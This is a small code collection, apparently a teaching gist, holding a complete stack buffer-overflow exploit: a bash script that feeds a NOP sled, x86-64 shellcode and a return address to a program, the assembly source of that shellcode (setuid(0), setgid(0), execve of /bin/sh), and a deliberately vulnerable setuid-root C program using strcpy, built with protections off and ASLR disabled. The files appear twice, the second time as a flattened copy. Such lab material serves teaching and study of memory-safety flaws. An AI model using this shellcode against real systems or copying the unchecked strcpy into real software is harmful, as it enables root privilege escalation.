camargo/attack.sh

## attack.sh
#!/bin/bash

# Tested on Ubuntu 18.04-desktop-amd64.
# To disable ASLR do: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
# The shellcode was built from the output of objdump appended to a NOP (x90) sled.

# 1. type whoami
# 2. run this script
# 3. type whoami

export SHELLCODE=$(perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x31\x48\x31\xff\xb0\x69\x0f\x05\xc3\x48\x31\xff\xb0\x6a\x0f\x05\xc3\x5e\x48\x31\xc0\x88\x46\x07\x48\x8d\x1e\x48\x89\x5e\x08\x48\x89\x46\x10\xb0\x3b\x48\x89\xf7\x48\x8d\x56\x10\x48\x8d\x76\x08\x0f\x05\xe8\xca\xff\xff\xff\xe8\xcd\xff\xff\xff\xe8\xd0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x41\x41\x41\x41\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x72\xdd\xff\xff\xff\x7f";')
./victim $SHELLCODE

## shellcode.asm
; nasm -f elf64 -g shellcode.asm
; ld -o shellcode shellcode.o
; objdump -d shellcode

section .mytext progbits alloc exec write align=16
	global _start

_start:
	jmp short GotoCall

setuid:
	xor rdi, rdi        ; arg 1 = 0
  	mov byte al, 0x69   ; setuid syscall
  	syscall
  	ret

setgid:
  	xor rdi, rdi        ; arg 1 = 0
  	mov byte al, 0x6A   ; setgid syscall
  	syscall
  	ret

shellcode:
	pop rsi
	xor rax, rax
  	mov byte [rsi + 7], al
	lea rbx, [rsi]
	mov [rsi + 8], rbx
	mov [rsi + 16], rax
	mov byte al, 0x3b   ; execve syscall
	mov rdi, rsi        ; arg 1
	lea rdx, [rsi + 16] ; arg 3
	lea rsi, [rsi + 8]  ; arg 2
	syscall

GotoCall:
  	call setuid
  	call setgid
	call shellcode
	db '/bin/shJAAAAAAAAKKKKKKKK'

## victim.c
/**
 * gcc -o victim -fno-stack-protector -z execstack victim.c
 * sudo chown root victim
 * sudo chmod +s victim
 */

#include <string.h>

int main(int argc, char *argv[]) {
  char little_array[256];

  if (argc > 1) {
    strcpy(little_array, argv[1]);
  }
}
	#!/bin/bash

	# Tested on Ubuntu 18.04-desktop-amd64.
	# To disable ASLR do: echo 0 \| sudo tee /proc/sys/kernel/randomize_va_space
	# The shellcode was built from the output of objdump appended to a NOP (x90) sled.

	# 1. type whoami
	# 2. run this script
	# 3. type whoami

	export SHELLCODE=$(perl -e 'print "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x31\x48\x31\xff\xb0\x69\x0f\x05\xc3\x48\x31\xff\xb0\x6a\x0f\x05\xc3\x5e\x48\x31\xc0\x88\x46\x07\x48\x8d\x1e\x48\x89\x5e\x08\x48\x89\x46\x10\xb0\x3b\x48\x89\xf7\x48\x8d\x56\x10\x48\x8d\x76\x08\x0f\x05\xe8\xca\xff\xff\xff\xe8\xcd\xff\xff\xff\xe8\xd0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41\x41\x41\x41\x41\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x72\xdd\xff\xff\xff\x7f";')
	./victim $SHELLCODE
	; nasm -f elf64 -g shellcode.asm
	; ld -o shellcode shellcode.o
	; objdump -d shellcode

	section .mytext progbits alloc exec write align=16
	global _start

	_start:
	jmp short GotoCall

	setuid:
	xor rdi, rdi ; arg 1 = 0
	mov byte al, 0x69 ; setuid syscall
	syscall
	ret

	setgid:
	xor rdi, rdi ; arg 1 = 0
	mov byte al, 0x6A ; setgid syscall
	syscall
	ret

	shellcode:
	pop rsi
	xor rax, rax
	mov byte [rsi + 7], al
	lea rbx, [rsi]
	mov [rsi + 8], rbx
	mov [rsi + 16], rax
	mov byte al, 0x3b ; execve syscall
	mov rdi, rsi ; arg 1
	lea rdx, [rsi + 16] ; arg 3
	lea rsi, [rsi + 8] ; arg 2
	syscall

	GotoCall:
	call setuid
	call setgid
	call shellcode
	db '/bin/shJAAAAAAAAKKKKKKKK'
	/**
	* gcc -o victim -fno-stack-protector -z execstack victim.c
	* sudo chown root victim
	* sudo chmod +s victim
	*/

	#include <string.h>

	int main(int argc, char *argv[]) {
	char little_array[256];

	if (argc > 1) {
	strcpy(little_array, argv[1]);
	}
	}